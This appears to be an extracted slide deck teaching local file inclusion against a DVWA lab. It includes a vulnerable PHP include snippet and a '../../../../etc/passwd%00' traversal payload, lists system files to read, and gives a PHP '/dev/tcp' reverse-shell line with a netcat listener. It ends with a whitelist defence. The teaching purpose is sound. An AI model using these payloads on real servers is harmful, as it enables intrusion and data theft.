Local File Inclusion to Remote Code Execution
- 2. Introduction
What is a file inclusion vulnerability?
How the attack works?
RFI/LFI vulnerable PHP functions
Traverse and read local files
PathTraversal / FI using scanners
Reverse shell via LFI
Other ways to inject your code
Defending yourself
- 3. What is a file inclusion vulnerability?
Input validation
The application trusts/doesn’t validate the user input
The code includes/imports other pages
Dynamic including of the page
When PHP includes a file it will parse any PHP code within
that file (“<?php” and “?>”)
Do not trust the user…ever !!
- 4. How the attack works?
http://192.168.109.136/dvwa/vulnerabilities/fi/?page=include
The code would be:
<?php $file =$_GET[‘file'];
include("/".$file .".php"); <--Vulnerable !!
?>
Assign page to "../../../../etc/passwd%00“
<?php $file =$_GET[‘file'];
include("/../../../../etc/passwd%00.php"); <-- Directory Traversal to LFI ?>
%00 (Null CHAR) will ignore everything that comes after %00
../../../ will traverse path to root and goto /etc/passwd
- 6. Common locations
Normally, the following files are read:
/etc/passwd
/etc/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/httpd/conf/httpd.conf
Other Unix common locations
- 7. Path Traversal / FI using scanners
http://sectooladdict.blogspot.in/ OR http://sectoolmarket.com/
- 9. Reverse shell via LFI
PHP script to open an outbound TCP connection
<?php exec("bash -i >& /dev/tcp/<yourIP>/<port> 0>&1"); ?>
Go and catch the reverse shell
nc –lp <port>
- 10. Other ways to inject your code
Using directory traversal to read files
Log poisoning (access.log, error.log)
Session variables
Uploaded files
Emails
Shared hosting
FTP and other logs
- 11. Defending yourself
<?php
$page_files=array( 'about'=>'about.html',
'photos'=>'photos.html',
'contact'=>'contact.html',
'home'=>'home.html'
);
if (in_array($_GET['page'],array_keys($page_files))) {
include $page_files[$_GET['page']];
} else {
include $page_files['home'];
}
?>